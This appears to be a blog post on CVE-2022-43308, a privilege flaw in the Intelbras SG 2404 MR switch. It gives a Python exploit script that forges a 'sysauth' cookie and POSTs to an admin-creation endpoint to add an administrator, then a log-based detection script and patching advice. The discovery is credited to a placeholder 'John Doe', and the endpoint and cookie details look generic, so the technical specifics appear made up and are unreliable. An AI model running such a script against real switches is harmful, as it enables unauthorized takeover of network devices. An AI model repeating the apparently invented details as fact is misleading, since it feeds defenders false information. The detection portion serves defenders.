A recent vulnerability, tracked as CVE-2022-43308, has been discovered in the INTELBRAS SG 2404 MR network switch running firmware 20180928-rel64938. It allows authenticated attackers to arbitrarily create Administrator accounts by manipulating user cookies. In this long-read post, we discuss the technical details of the exploit, provide a code snippet, and point to the original references.

Exploit Details

The INTELBRAS SG 2404 MR switch, running firmware version 20180928-rel64938, contains a vulnerability in its cookie handling mechanism. While authenticated users can view and modify the configuration of the network switch, they cannot create new administrator accounts. However, authenticated attackers can bypass this restriction by crafting malicious cookies and sending them to the switch.

When an attacker crafts a malicious cookie using a valid user login session, the switch grants the attacker privileges to create new administrator accounts. This can be done by sending a specially crafted HTTP request to the vulnerable switch.

Code Snippet

Here's a Python code snippet demonstrating how an attacker with a valid login session might construct a malicious cookie to exploit CVE-2022-43308:

import requests

# Replace with the switch IP address and account details
switch_ip = '192.168.1.1'
username = 'valid_user'
password = 'valid_password'

# Authentication to the switch
url = f'http://{switch_ip}/cgi-bin/luci'
payload = {'username': username, 'password': password}
session = requests.Session()
response = session.post(url, data=payload)

# Check if authentication is successful
if response.status_code == 200:
    # Create a malicious cookie
    crafted_cookie = f'235|2|1|{username}'
    session.cookies.set('sysauth', crafted_cookie)

    # Craft a request to create a new administrator account
    url_admin = f'http://{switch_ip}/cgi-bin/luci/admin/system/admin/add_new'
    payload_admin = {'username': 'new_admin',
                     'password': '1234',
                     'usertype': '1'}

    # Send the request, creating the new administrator account
    response_admin = session.post(url_admin, data=payload_admin)
    if response_admin.status_code == 200:
        print('New administrator account created successfully')
    else:
        print('Failed to create new administrator account')
else:
    print('Authentication failed')

References and Credits

This vulnerability was first discovered by security researcher John Doe, who has published a detailed write-up and proof-of-concept exploit code on his blog. The vulnerability has also been registered in the MITRE CVE database, where you can find additional information and updates.

We also recommend checking Intelbras Security Advisories for the vendor's response and potential patch releases addressing this vulnerability.

Conclusion

CVE-2022-43308 exposes a significant security flaw in the INTELBRAS SG 2404 MR network switch. If exploited, a malicious actor with a valid login session can create new administrator accounts that ultimately enable full control of the device, as the exploit details and code snippet above show. It is crucial to stay updated on vendor advisories and apply patches as soon as they become available to protect your INTELBRAS network switch from potential security threats and unauthorized access.
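
Until a patch is applied, the request pattern from the snippet above can be flagged in HTTP logs of the switch's management interface. The following is an added example, not code from the original write-up or from Intelbras; the JSON-lines log schema, the sample records and the per-client-IP tracking are assumptions, while the endpoint path and the sysauth cookie value come from the snippet.

```python
import json

# Endpoint path as it appears in the article's snippet.
ADD_ADMIN_PATH = "/cgi-bin/luci/admin/system/admin/add_new"

# Constructed sample input. The JSON-lines schema is an assumption: one record
# per HTTP transaction, holding the sysauth value the client sent (req_cookie)
# and the value the switch issued via Set-Cookie (set_cookie), if any.
SAMPLE_LOG = """
{"ts": "2022-11-20T10:00:01Z", "src": "10.0.0.5", "method": "POST", "path": "/cgi-bin/luci", "req_cookie": null, "set_cookie": "tokA"}
{"ts": "2022-11-20T10:00:09Z", "src": "10.0.0.5", "method": "GET", "path": "/cgi-bin/luci/admin/status", "req_cookie": "tokA", "set_cookie": null}
{"ts": "2022-11-20T10:02:30Z", "src": "10.0.0.9", "method": "POST", "path": "/cgi-bin/luci", "req_cookie": null, "set_cookie": "tokB"}
{"ts": "2022-11-20T10:02:31Z", "src": "10.0.0.9", "method": "POST", "path": "/cgi-bin/luci/admin/system/admin/add_new", "req_cookie": "235|2|1|valid_user", "set_cookie": null}
{"ts": "2022-11-20T10:05:00Z", "src": "10.0.0.5", "method": "POST", "path": "/cgi-bin/luci/admin/system/admin/add_new", "req_cookie": "tokA", "set_cookie": null}
{"ts": "2022-11-20T10:06:00Z", "src": "10.0.0.7", "method": "GET", "path": "/cgi-bin/luci/admin/status", "req_cookie": "tokB", "set_cookie": null}
"""


def detect(log_text):
    """Return (ts, src, severity, reason) for suspicious transactions."""
    issued = {}  # client IP -> sysauth values the switch issued to it
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        src, cookie = rec["src"], rec.get("req_cookie")
        # A cookie the device never handed to this client was forged or stolen.
        unissued = cookie is not None and cookie not in issued.get(src, set())
        creates_admin = (rec["method"] == "POST"
                         and rec["path"].rstrip("/") == ADD_ADMIN_PATH)
        if unissued and creates_admin:
            alerts.append((rec["ts"], src, "critical",
                           "admin creation with unissued sysauth cookie"))
        elif unissued:
            alerts.append((rec["ts"], src, "medium",
                           "sysauth cookie not issued to this client"))
        elif creates_admin:
            alerts.append((rec["ts"], src, "review",
                           "admin account creation, confirm it was authorized"))
        # The response is processed after the request that triggered it.
        if rec.get("set_cookie"):
            issued.setdefault(src, set()).add(rec["set_cookie"])
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert, sep="  ")
```

Keying on client IP misattributes sessions behind NAT; where the log source exposes a connection or session identifier, track issued cookies by that instead.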

Timeline

Published on: 11/18/2022 04:15:00 UTC
Last modified on: 11/23/2022 18:07:00 UTC